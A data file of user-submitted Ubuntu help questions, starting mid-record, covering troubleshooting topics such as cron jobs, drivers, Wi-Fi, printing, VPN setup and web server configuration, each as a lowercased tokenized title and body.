rotate none xsetwacom set `` 11 '' rotate none xsetwacom set `` 15 '' rotate none ; ; esac exit 0 how can i resolve the issue ?
454299	what does bash do with line 11 here ?	the nature of the question here is broad enough truly to include ubuntu . i was just picking around forums analyzing this and that and line 11 puzzled me . what i would like to know is , what exactly is it doing ? am i wrong to believe it 's related to the touch and mkdir commands ? or is that file assumed already created ? 1 # ! /bin/sh 2 3 export external_storage=/mnt/storage 4 pythonpath=/mnt/storage/com.googlecode.pythonforandroid/extras/python 5 pythonpath= $ { pythonpath } : /data/data/com.googlecode.pythonforandroid/files/python/lib/python2.6/lib-dynload 6 export pythonpath 7 export temp=/mnt/storage/com.googlecode.pythonforandroid/extras/python/tmp 8 export python_egg_cache= $ temp 9 export pythonhome=/data/data/com.googlecode.pythonforandroid/files/python 10 export ld_library_path=/data/data/com.googlecode.pythonforandroid/files/python/lib 11 /data/data/com.googlecode.pythonforandroid/files/python/bin/python `` $ @ ''
454304	white icons , yellow red blue dotted horizontal lines , gray boxes , etc on desktop & webpages	i have previously did a reinstall of ubuntu 13.10 because jack was not running correctly . i have only installed aptik and no other programs since then . but here is the deal - i have white icons in the toolbar & white icons in other places ( such as system settings ) , yellow red blue dotted horizontal lines ( different colors showing up at different times ) across the screen , grayed out boxes at the top of the screen . it is not a performance problem just a visual problem and annoying . it sometimes appears within firefox browser as well . also garbled up text within the browser . i would post a screenshot , but i just noticed that i need 10 reputation to post images . i may have to come back and edit that when i achieve the reputations . some of my specs : subsystem : asustek computer inc. device 0c11 vga compatible controller : nvidia corporation nv11 [ geforce2 mx/mx 400 ] i am new to posting problems here , so if you need more info just ask . any hints , ideas , or solutions are greatly appreciated .
454305	intermediate ubuntu books ?	i 'm new to ubuntu and looking for some good books to help me use it to it 's full strength . however , after quite a bit of searching , i have n't found anything suitable . most books are for absolute beginners , covering stuff like installing the os , basic system settings , getting around with unity - all of which i 've figured out already . on the other end of the spectrum are the advanced books , that i 'm frankly unable to follow , because i 'm rather new to ubuntu , and linux in general . what i 'm looking for is a book that can bridge the gap between these two categories .
454308	gtk-3 accessibility warning	i installed xubuntu 14.04 with the most recent libgtk-3-dev library . then i recompiled all my c programs . now all these programs output a warning which was not there before , when i had these programs running under xubuntu 13.1 with the old libgtk-3-dev . the warning is ** ( program.x:2430 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-dpoedwyibh : connection refused how can one suppress this message ?
454309	intermittent crontab problem	my crontab entry intermittently fails to find scripts in my user 's home directory . the crontab entries run exactly on schedule as specified , and occasionally the script runs correctly , but mostly it only produces output like this : /bin/sh : 1 : /home/ < user > /script/check_cgi.pl : not found the crontab entry for this is : 5,35 * * * * /home/ < user > /scripts/check_cgi.pl > > /tmp/check_cgi.pl.out 2 > & 1 i have double-checked that the script exists , and that root can see the filesystem and that the command runs correctly if i sudo to root . does anyone have any suggestions as to why cron would frequently not be able to find a file and how to solve it ? edit this is root 's crontab ( edited by sudo crontab -e ) , hence the relevance of checking that root can see the script . the permissions on the script are : -rwxrwxr-x 1 < user > < user > 700 apr 20 09:27 check_cgi.pl and the directory permissions 775 or 755 too , so there is no problem with root having permissions to execute the script . it seems that cron started to `` find '' the script after i added a new cron job to run `` find / '' ; as if forcing cron to go through the entire directory tree allowed it to `` find '' the script again . there are 4 scripts , which are all contained in the same directory . they run at various times ( every 15 mins , every 30 mins , once per day ) and they all have this problem at the same time . and then when the problem goes , they all work ok. edit 2 i have found the problem ... by running each hour the cron job `` ll -lr /home '' , i discovered that around 15.00 it started to incorrectly report the contents of the /home/ directory . instead of the correct collection of directories ( including the required scripts directory ) , it showed the completely different contents : lrwxrwxrwx 1 < user > < user > 56 jan 18 20:53 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop lrwxrwxrwx 1 < user > < user > 52 jan 18 20:53 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt and when i view the /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt file , it tells me : this directory has been unmounted to protect your data . from the graphical desktop , click on : `` access your private data '' or from the command line , run : ecryptfs-mount-private so that appears to be the answer . the home directory is set up as an encrypted filesystem and the operating system unmounts it in periods of low use `` to protect your data '' . i just need to work out how to disable this behaviour either permanently or when the cron jobs run . i guess the answer is within ecryptfs-mount-private ...
454313	revert erlang otp version	i have upgraded my ubuntu to latest version . this automatically updated my erlang version from 5.10.2 to 5.10.4 i.e otp 16r01 to otp 16r03 $ erl +v erlang ( smp , async_threads ) ( beam ) emulator version 5.10.4 here is my updated ubuntu details : $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty since the project is throwing error : , { badarg , [ { erlang , halt , [ 1 , '' chicago boss is not comptable with 16r03 '' ] , [ ] } is there any way to revert my otp version ?
454314	maas-pserv main process ended , respawning	i was trying to get maas cluster controller running on ubuntu 14.04 using a clean server install and adding the maas package for the cluster-controller manually later . i have another machine running the maas-regional-controller . i have two issues with the controller installation : apache 2 hangs when installing the maas-cluster-controller package , due to some missing python module called crochet maas-pserv crashes with error code 1 , gets re-spawned and finally is stopped by init , due to the high frequency of the restarts . i installed the python-crochet package , in order to make apache start . is this something due to some omission in the dependency list of apache installation ? hopefully it was ok to install the package in the first place . the maas-pserv does not start and i do n't know due to which cause . i tried to look into the log files in /var/log/maas , but pserv does not write any log file , maybe since the crash is created by upstart . i tried to start pserv manually through the twistd call as in /etc/init/maas-pserv.conf . twisted complains that it does not know the command maas-pserv . by no means i 'm a python expert , but i only can imagine ( educated guess ) that twisted is not importing the maas python application library and therefore complains about not knowing about it . an ideas why maas-pserv is crashing ?
454315	ubuntu 14.04 / 64 bit stucks while using it	newbie here ! ! ! so guys iâm running ubuntu 14.04 and everything was perfect before i begun to get stuck while using it , several times , the systems just stop and nothing is working ! every time i need to press the power off button to shutdown the systems and power it on again , and iâm losing a lot of things can any one tell me what to do ? ? ? thanks in advance when it stuck it looks like this :
454316	filter terminal command to text file	problem : i have dmesg | grep ttyusb command that has the following output : [ 7.648896 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 7.649091 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 7.649502 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 17406.327030 ] option1 ttyusb0 : gsm modem ( 1-port ) converter now disconnected from ttyusb0 [ 17406.329670 ] option1 ttyusb1 : gsm modem ( 1-port ) converter now disconnected from ttyusb1 [ 17406.334036 ] option1 ttyusb2 : gsm modem ( 1-port ) converter now disconnected from ttyusb2 [ 90128.405694 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb0 [ 90128.405987 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb1 [ 90128.406295 ] usb 1-4 : gsm modem ( 1-port ) converter now attached to ttyusb2 [ 90132.905458 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb3 [ 90132.905791 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb4 [ 90132.906541 ] usb 1-2 : gsm modem ( 1-port ) converter now attached to ttyusb5 [ 90148.661532 ] usb 1-1 : gsm modem ( 1-port ) converter now attached to ttyusb6 [ 90148.661828 ] usb 1-1 : gsm modem ( 1-port ) converter now attached to ttyusb7 [ 90148.662440 ] usb 1-1 : gsm modem ( 1-port ) converter now attached to ttyusb8 need to redirect this output to a text file , i am using the following command for this : dmesg | grep ttyusb > test.txt everything works fine , but i need only list the available ports . i wish the text file output to be like this : ttyusb0 ttyusb1 ttyusb2 ttyusb3 how can i do this ?
454320	boot memory /dev/sda1/boot full	my computer keeps asking me to update but there is no space , boot memory at 100 % . have tried apt-get clean , sudo apt-get clean and sudo rm .xsessions-errors . none of which work . any suggestions greatfully received . nb , i am not a computer whiz so baby steps please
454322	ubuntu gnome or gnome shell	i am probably missing something fundamental here but what is the difference between installing ubuntu gnome and installing plain ubuntu and then installing gnome shell from the repositories ? apart , of course , that one also gets unity . is there a best option for getting a pure gnome experience ? andrew
454325	can not connect to wifi at home after upgrade to ubuntu 14.04	this really make me struggle , i have upgrade my dell xps13 9333 from ubuntu 13.10 to 14.04 , now i could never connect to the wifi at home . the wifi card can see the wireless network , but can not connect to it , sometimes it does , but if i ping some external server in the internet , it disconnected the wifi automatically , i have also tried the ubuntu gnome 14.04 , it keeps asking the wifi 's password , and still can not connect to the internet . but the laptop can connect to the open wifi in my company , which make me crazy , i can not figure out which part is wrong . the encryption of my home is wpa/wpa2 personal . any one can help could be very appreciate .
454328	how to install abaqus ?	i am trying to install abaqus 6.12 on ubuntu 12.04 . i could mount the .iso file on a virtual drive . when i try to run the setup file , i get the following error : ***error . the installation should not be executed from the directory that contains the setup files . please change your current working directory and rerun the installation . the following is a part of the setup file i have . # ! /bin/csh -f set args= ( $ argv ) @ arglen = $ # args set cmd = $ 0 set setup_dir = $ cmd : h set my_cwd = $ cwd cd $ setup_dir set setup_dir = $ cwd cd $ my_cwd if ( `` $ setup_dir '' == `` $ my_cwd '' ) then echo `` ***error . the installation should not be executed from `` echo `` the directory that contains the setup files . '' echo `` please change your current working directory and '' echo `` rerun the installation . '' exit 1 endif how do i install abaqus on ubuntu ?
454329	how to disable live window resizing in trusty tahr	subject says it all . how do i get rid of live window resizing ? there 's no setting for that either in `` appearance '' or in `` unity tweak tool '' .
454330	ca n't access flask from local network	i 've already read this thread , but it is not what i 'm looking for . i 'm running flask on ubuntu 13.10 with this configuration , but i ca n't access it from the local network using the correct ip and port number ( local works ) . port = os.getenv ( 'vcap_app_port ' , '5000 ' ) app.debug = true app.run ( host='0.0.0.0 ' , port=int ( port ) ) netstat output ( should be fine ) : tcp 0 0 0.0.0.0:5000 0.0.0.0 : * listen 9480/python ufw status is `` inactive '' any ideas ? i think it 's still a firewall issue .
454332	sound problem after installing lubuntu desktop in ubuntu 14.04 lts	after installing lubuntu-desktop in ubuntu 14.04. i ca n't recorded sound . playback ok . i am searching a lot but i ca n't find anything . i also install ubuntu-restricted-extras and xfce4-mixer what can i do now . please suggest me . after installing pulseaudio volume control skype sound is ok . but i ca n't record with sound recorder .
454337	2 monitors show up in the displays when actually i have only one	i use a laptop and i have only one monitor . but when i check the displays it shows 2 monitors of which one is being shown as unknown . i have tried two monitors when only having one in 13.10 without any luck . can any one please help me with this . i run 14.04 . here is the out out of xrandr : http : //pastie.org/private/ecclsccz5l4qzn1tpy3yq here is my current grub config /etc/default/grub : http : //pastie.org/private/mdubs4clweqb93ivtgha this is the added line : grub_cmdline_linux= '' vga-1-2 : d '' and then i ran the update-grub command .
454340	teamviewer daemon is not running ubuntu 14.04 ( teamviewer 9 )	does n't seems to work in lubuntu 14.04 teamviewer 32 installs ok , deamon works pidof teamviewerd 18987 /opt/teamviewer9/tv_bin/teamviewerd -f but i get the teamviewer daemon is not running when i launch it teamviewer
454341	stuck in the shell prompt in ubuntu server 14.04	i have just installed ubuntu server 14.04 on vmware workstation and when i open it there is a shell prompt asking for username and password . after that it just says jkell311 @ ubuntu : ` $ i want to get to the gui and start using ubuntu server . i know this sounds like a stupid question but i have had no experience with linux nor ubuntu .
454345	is it possible to upgrade from 13.10 to 14.04 over ftp	how do i upgrade from 13.10 to 14.10 using ftp . http goes through a proxy and we a limited to 500m per week . ftp is not limited .
454347	how to allow wine to access network shares ?	i 've just installed 14.04 from scratch and made ms word working thanks to wine ( 1.7.17 from ppa ) . the problem is i ca n't access my network drive shares through wine ( i 'm in a office lan ) . with the old ubuntu 11.10 i just opened .doc files in ms word and edited , now it seems wine ca n't access the samba shares that are already mounted in nautilus . the problems seems to be related to recent changes in ubuntu way of mounting network shares : the old directory : /home/username/.gvfs is now replaced by : /run/user/1000/gvfs and the name of shares mounted are not readable from wine ( so it say trying to open the folder directly from ms word )
454348	connecting bada os phone to ubuntu	i have samsung phone that runs bada os . i want to connect it via usb cable to ubuntu to access the files on the phone , how do i do that ? the phone shows connected , but i can not see it on ubuntu .
454350	secure password manager	i am using ubuntu 14.04 with the default password manager , now i want to make the important passwords secure and the rest unimportant . now i have a keyring with a password and the other without a password . but is n't there a easy way to select witch keyring should be used by an application ? and by the way is there a way to lock all keyrings when i lock my desktop ?
454352	where is the tomcat 7 home / lib directory ?	when reading manuals / tutorials on setting up jdbc with tomcat i frequently come across references to the `` tomcat 's home\lib '' directory . e.g . : add the driver to your classpath , to your project , or to tomcat 's home\lib directory . other times , reference is made to the `` $ catalina_home/lib '' directory . e.g . : before you proceed , do n't forget to copy the jdbc driver 's jar into $ catalina_home/lib . i am running tomcat 7.0.53 and am aware of the following locations : /usr/share/tomcat7 /var/lib/tomcat7 ( where the webapps/ directory resides ) /etc/tomcat7 of the above location only /usr/share/tomcat7 contains a lib directory with jars . is this the `` tomcat 's home\lib '' directory ? what is then , the `` catalina_home/lib '' directory ?
454354	bumblebee running on nvidia does not increase performance	when i run anything with bumblebee it does n't provide performance increase compared to running on the intel integrated chip . is this an indication of incorrectly installed drivers and settings or just drivers not working properly yet ? my nvidia cars shows in lspci as : 09:00.0 3d controller : nvidia corporation gk208m [ geforce gt 730m ] ( rev ff ) i have installed newest nvidia drivers ( nvidia-337 ) and configured /etc/bumblebee/bumblebee.conf according to instructions like on this site to use the drivers . the card seems to be detected by bumblebee without any problems . following output from few example runs of glxspheres64 : anezka @ redquark ~ $ vblank_mode=0 glxspheres64 polygons in scene : 62464 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . visual id of window : 0x20 context is direct opengl renderer : mesa dri intel ( r ) haswell mobile 173.431794 frames/sec - 154.409795 mpixels/sec 149.875149 frames/sec - 133.436843 mpixels/sec 148.822554 frames/sec - 132.499696 mpixels/sec 149.262262 frames/sec - 132.891177 mpixels/sec anezka @ redquark ~ $ vblank_mode=0 optirun glxspheres64 polygons in scene : 62464 visual id of window : 0x20 context is direct opengl renderer : geforce gt 730m/pcie/sse2 83.187336 frames/sec - 74.063349 mpixels/sec 85.823322 frames/sec - 76.410220 mpixels/sec 84.681689 frames/sec - 75.393802 mpixels/sec 86.131217 frames/sec - 76.684345 mpixels/sec anezka @ redquark ~ $ vblank_mode=0 primusrun glxspheres64 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . polygons in scene : 62464 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . visual id of window : 0x20 context is direct opengl renderer : geforce gt 730m/pcie/sse2 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . 107.977603 frames/sec - 96.134619 mpixels/sec 108.357600 frames/sec - 96.472939 mpixels/sec 108.341271 frames/sec - 96.458401 mpixels/sec 108.348674 frames/sec - 96.464992 mpixels/sec i am using mint 16 - petra ; most packages for this are taken from ubuntu saucy
454355	can not connect to home wireless after upgrading to 14.04 from 13.10 , still able to connect to my phone hotspot though ?	i 'm no longer able to connect to my home wireless since upgrading to 14.04 , though my other devices still connect to it fine . the problem computer can still see all the available wireless ssid 's , and i 'm still able to connect to my phone hotspot . some details here , please let me know if there 's anything else i can provide that will help ! [ valley ] [ assignment5 ] > lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:16.3 serial controller : intel corporation 7 series/c210 series chipset family kt controller ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation qs77 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 02:00.0 system peripheral : ricoh co ltd mmc/sd host controller ( rev 07 ) 03:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 96 ) [ valley ] [ assignment5 ] > sudo lshw -c network *-network description : wireless interface product : centrino advanced-n 6205 [ taylor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 96 serial : 84:3a:4b:0c:80:48 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11abgn resources : irq:45 memory : f0c00000-f0c01fff *-network:0 disabled description : ethernet interface physical id : 2 logical name : wwan0 serial : ce : c4 : e9:85:40:36 capabilities : ethernet physical configuration : broadcast=yes driver=cdc_mbim driverversion=22-aug-2005 firmware=cdc mbim link=no multicast=yes *-network:1 description : ethernet interface physical id : 3 logical name : eth0 serial : 00 : b5:6d:00:21 : cd size : 100mbit/s capacity : 100mbit/s capabilities : ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=asix driverversion=22-dec-2011 duplex=full firmware=asix ax88772 usb 2.0 ethernet ip=10.1.1.17 link=yes multicast=yes port=mii speed=100mbit/s edit : fixed ! my apologies , it was a setting in my router was that incorrect , it was just a fluke that it was still working before by the looks as some of my devices worked , but i found another that did n't which helped isolate the problem !
454358	hear the audio of bluetooth and logitech mic from the usb soundcard	i have syba usb audio souncard ( that contain two pins one for mic and one for speaker ) . i have load the module-loopback using the following command : pactl load-module module-loopback source=alsa_input.usb-0d8c_c-media_usb_audio_device-00-device.analog-mono sink=alsa_output.usb-0d8c_c-media_usb_audio_device-00-device.analog-stereo latency_msec=1 source_dont_move=yes now the i am able to hear the audio from the usb soundcard speaker that i speak from the same usb soundcard mic . i have also another two audio devices like logitech mic and bluetooth device that are already connected to the system . i want the hear audio of both logitech mic and bluetooth devices also in the usb soundcard speaker . please let us know your thought ? thanks
454361	font in intellij idea on ubuntu 14.04	i installed idea 13.1 and oracle jdk 1.8 . when i launch idea i see very bad font it is ugly . how i can fix this . ubuntu 14.04 x64 . oracle jdk 1.8 here 's a screenshot
454362	to which catalyst version correspond the fglrx-update drivers of 14.04	i cant get my head with the version number of catalyst and fglrx . i had 12.04 with 13.1 catalyst and upgraded to 14.04 and selected from the additional drivers tab the fglrx update driver . to which catalyst version does this correspond to ?
454364	lubuntu 12.04 wo n't boot after install	i just installed lubuntu 12.04 on my laptop ( compaq presario v5000 ) . it seemed to install fine , but after the install completed it stops booting when it gets to the blue lubuntu screen . i have the cd removed and the ethernet cable unplugged . any help would be great ! thanks in advance .
454365	ubuntu 14.04 wo n't boot or shut down normally	here 's the story : i 've upgraded from 12.04 ( running alongside a windows 7 ) to 14.04 from a dvd . i told it to delete the previous version completely , so it was technicaly a fresh install rather than an upgrade . everything seemed to work fine after the installation , so i played around a little and broke my desktop with some odd compiz settings . i had no idea how to fix it quickly , so i decided to simply install ubuntu again ( and again deleting the previous version completely ) . the installation ran through fine , but when it came to the reboot after the last step , i landed on a grub console : gnu grub version 2.02~beta2-9 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions grub > _ oh well ... after asking google i assumed that this means that the bootloader does n't know what to load . so i entered the boot device selection on startup and saw this : if i select `` internal hdd '' in the boot manager , everything works fine - i get the purple grub screen and it even shows me my windows 7 . but having to call the boot manager on each start is not quite a solution . so , wondering where the 2 ubuntu entries came from , i took a look at the boot menu in the bios and found this : so as far as i understand it has something to do with grub and uefi , but i do n't know enough about any of it to put it all together ... so my question is : what 's wrong here and how can i fix this ? when i shut down ubuntu , it hangs on the purple screen , with the dots blinking , but even after 10 minutes nothing happens , so i have to switch it off . rebooting works as expected , though . does it have something to do with the problem above ?
454372	dark gtk theme for ubuntu 14.04	i am using the zoncolor darknight theme on ubuntu 13.10 and am quite pleased with it . i would like to have a similar theme for ubuntu 14.04 but so far i could not find a single dark theme available . is it possible to port a theme from ubuntu 13.10 to 14.04 ? or must i wait for zoncolor ( or whomever ) to release new themes for ubuntu 14.04 ?
454374	receiving obscure data after upgrade to 14.04	i upgraded to 14.04 recently ( obviously ) . since the upgrade , i started noticing that my internet was extremely slow for the first couple of minutes . checking the system monitor , it seems that my system downloads about 25mb after i connect to the internet , using the whole downstream . how can i check what process is requesting the download ? update . nethogs tells me that the service requesting the download is /usr/bin/python . so , it looks like a python script is downloading about 25mb every time i establish an internet connection , which does n't occur when i disable dropbox . what file would dropbox need to download every day ? how can i track down the downloaded file ?
454377	unable to print on network printer ricoh aficio mp c3001 on ubuntu 14.04	after a fresh installation of ubuntu 14.04 i 'm no longer able to print using the ricoh aficio mp c3001 printer that is accessible via samba on the network . job completes normally but nothing gets printed . it requires user authentification and an additional user code . the user code was configured using lpoptions -p printername -o usercode=xxx which correctly changes ~/.cups/lpoptions with the user code . i also tried changing the ppd file with the custom user code instead of the predefined 100x values but this did not change the problem that i 'm no longer able to print . the printer gets detected and even seems to respond to a print job ( it wakes up , but instead of printing , shuts down again ) . printer works fine with the same settings using windows and also previously worked with ubuntu 13.10 and the same configuration . here is a ( small ) part of the cups error_log . d [ 24/apr/2014:10:58:24 +0200 ] cupsdsetbusystate : newbusy= '' dirty files '' , busy= '' active clients and dirty files '' d [ 24/apr/2014:10:58:24 +0200 ] cupsd is not idle any more , canceling shutdown . d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] post / http/1.1 d [ 24/apr/2014:10:58:24 +0200 ] cupsdsetbusystate : newbusy= '' active clients and dirty files '' , busy= '' dirty files '' d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] no authentication data provided . d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] 2.0 cups-get-printers 6 d [ 24/apr/2014:10:58:24 +0200 ] cups-get-printers d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] returning ipp successful-ok for cups-get-printers ( no uri ) from localhost d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] content-length : 482 d [ 24/apr/2014:10:58:24 +0200 ] cupsd is not idle any more , canceling shutdown . d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] cupsdwriteclient error=0 , used=0 , state=http_state_post_send , data_encoding=http_encoding_length , data_remaining=482 , response=0x7fb6a5e8f410 ( ipp_idle ) , pipe_pid=0 , file=-1 d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] writing ipp response , ipp_state=data , old wused=0 , new wused=0 d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] bytes=0 , http_state=0 , data_remaining=0 d [ 24/apr/2014:10:58:24 +0200 ] [ client 19 ] waiting for request . troubleshooting guide did not help and printing a document does not give me any error messages .
454378	set up openvpn ( mullvad ) ?	i 'm trying to set up an openvpn virtual adapter for my mullvad vpn service ( which is excellent , by the way ) . anyway i 'm in the network connections utility/panel/applet/whatever-it-is and i am trying to figure this out . i specified that i wish to create an openvpn connection and it is asking me for some settings . from mullvad i downloaded my linux settings as a compressed folder and i have some files inside a folder named as my user-name ( user-number , actually ) : ca.crt , crl.pem , mullvad.crt , mullvad.key , and mullvad_linux.conf . the openvpn window is asking me for some files , but i do n't know which are which . it is set to use certificates ( tls ) and is asking me for user certificate , ca certificate , and private key . ( it also wants a private key password in a password-entry box . ) how do i successfully set this up ? thanks in advance for your attention .
454380	headphone jack not working in ubuntu	i have a asus k55vm model with windows7 dual boot with ubuntu 12.04 lts installed . ever since the ubuntu installation my earphone/headphone jack is not working . any help on the topic is welcome . i have tried a few solutions mentioned on askubuntu forum but none worked .
454381	does ubuntu phone support rtc alarm ?	is /sys/class/rtc/rtc0/wakealarm present ? does phone wake up after setting it when it 's completely switched off ? what does it do when the phone is locked ? will it be supported in hardware by all phones/socs ?
454383	theme and icons look old after upgrade to 14.04 - amd gpu issues ?	yesterday i upgraded from 13.10 to 14.04 and i ran into a few problems . interestingly i upgraded two computers ( one of which has identical hardware ) before this one and had no problems . when i booted up after the upgrade the screen was flickering , artifacts were everywhere , the 'theme ' and icons looked like they came from a old version of gnome and the background appeared only on half of one of my monitors ( the rest was black and i could n't even move my mouse on the black area ) . i have an amd r9 280x so immediately my thought was that i should purge and reinstall the proprietary drivers . i did the following : sudo apt-get remove -- purge fglrx fglrx-amdcccle fglrx-dev sudo apt-get remove -- purge xserver-xorg-video-ati xserver-xorg-video-radeon sudo apt-get install xserver-xorg-video-ati sudo apt-get install -- reinstall libgl1-mesa-glx libgl1-mesa-dri xserver-xorg-core sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.backup sudo rm -rf /etc/ati after a restart the flickering issue was gone and my two monitors appeared to behave mostly ok ( only problem is that the ccw i put on my 2nd monitor does n't survive a restart ) , but the icons , buttons and theme remain looking like they came out an old version of gnome . also , the menu bar appears twice in every window : once in the title bar and once well as below in it 's own barhere are some photos to show what i mean ( sorry about the quality ; i had to take them with my phone because the 'print scrn ' button has also stopped working after the upgrade ) : how can i fix this and get my 14.04 looking as beautiful as it was designed to look ?
454385	i need keyboard layout help lubuntu	running lubuntu 14.04 on my laptop . my laptop has a compressed keyboard , everything -numpad . it seems that i need to notify lubuntu of that . for example , the @ is under \ and vice versa . i can live with it but it 'd be nice if someone knew how to change it . i 'm running amd64
454389	display problem in hp compaq laptop	i am recently installed ubuntu 12.04 in my laptop hp compaq with an amd turion processor.model no . hp presario v6000 . it works well when booted from dvd but after installation display will not work and notification comes saying that paid drivers are avilable for downloading . but it does not give any detailes and i can not explore it because there is no display . please advice me how to procewed . sachidananda
454393	pactester dont find pacfile	if i run pactester -p wpad.dat -u http : //google.com on terminal , as it says in the manual i get this error pacparser.c : pacparser_parse_pac : could not read the pacfile : : wpad.dat : no such file or director pactester.c : could not parse the pac file : wpad.dat do i need to enter the exact url ? if yes how can i get it ? i have ubuntu 12.04 running on a vmware player hope someone can help me greetings
454395	video playback issue running ubuntu 14.04 guest in virtualbox with win 7 host	i installed ubuntu 14.04 in virtual box on my win 7 laptop . when i go to a website that has video ( msn , youtube , cnn , etc ) and attempt to play the videos , the playback stops 5-7 seconds into the videos on all sites . i have run 13.10 in vbox using the same hardware with no issues . before i installed this version of ubuntu , i upgraded to the latest version of vbox so that could be another source of problems as well . could someone tell me what settings i can check to fix this issue . thanks .
454399	my swedish keyboard is set to english in ubuntu 14.04	just installed ubuntu 14.04 this morning and i can not get back my swedish keyboard , even though i did have the swedish keyboard in the setting . any clue on how i can get it back ?
454408	wake-on-lan on thin clients after power outage	i 've got two thin clients and terminal server based on ubuntu 12.04 lts 64x . also i 've got the script , that wake clients , when i need it . but after power outage ( i mean at all ) , wake-on-lan function does n't work . i supposed to turn on and off my clients manually . i 've seen some posts about it , but there no possible decisions for me . please help novice !
454410	could someone please explain to me the difference between gconf , gconf-2 and gconf-editor ?	i am really curios to learn about these 3 since i do n't really understand how they work . i read somewhere that gconf-editor is basically the graphical representation of gconf however what is gconf-2 for ? also , before i installed gconf-editor , i pressed alt-f2 and tried to open gconf but it would n't open . what happens in the system if you click on gconf or gconf-2 as opposed to gconf editor ? thank you very much !
454412	gedit text editor is not opening properly in ubuntu 12.04	g edit text editor is not opening properly in ubuntu 12.04 . when i press alt+tab it shows in the list but does not shows when i click it . it works fine for some time after that it does n't work . i am not able to even unlock or lock from launcher . please help me ? ?
454413	boot error for newly compiled kernel in ubuntu	when i am booting into the newly compiled kernel it is showing error . following image shows where the booting stopped .
454418	how can i get rhythmbox to display the correct album cover art ?	i am an xp user who is exploring linux oss and apps - so i am not familiar with terminal commands and would like answers in plain english ! using rhythmbox 2.96 i can find and play the music tracks i have on my computer . each track already has cover art originally associated with it by windows media player . i do n't know how the images are stored , filed or linked , but the album art images show in the my music folder . however ... .. when i play the music in rhythmbox , the cover-art displayed in the bottom left corner of the screen seems to be totally random . the image displayed rarely corresponds to the track being played . how can i ensure that the correct image is shown with each track ? edit : some further info . in my rhythmbox screen when i click the edit tab and look at plugins , i see that cover art and cover art search are listed and ticked - implying that both plugins are already installed . if so , where are they and how can they be activated or used ?
454419	prevent group ownership change on file save ?	for any given file in the web root , the permissions are initially set to me : www-data with chmod 750 . opening a file in an editor and saving via the editors save command changes the group to me : me . how do i prevent group changes on save ?
454424	htaccess redirect without authentication entry	i have an .htaccess file at the root of my server which has auth on it . i have a redirect statement that upon entering example.myserver.com instead of myserver.com redirects the user to a sub folder with satisfy any in the .htaccess , but when using example.myserver.com the auth seems to kick in before the redirect happens , is there a way to let it see that the folder to redirect to is public ?
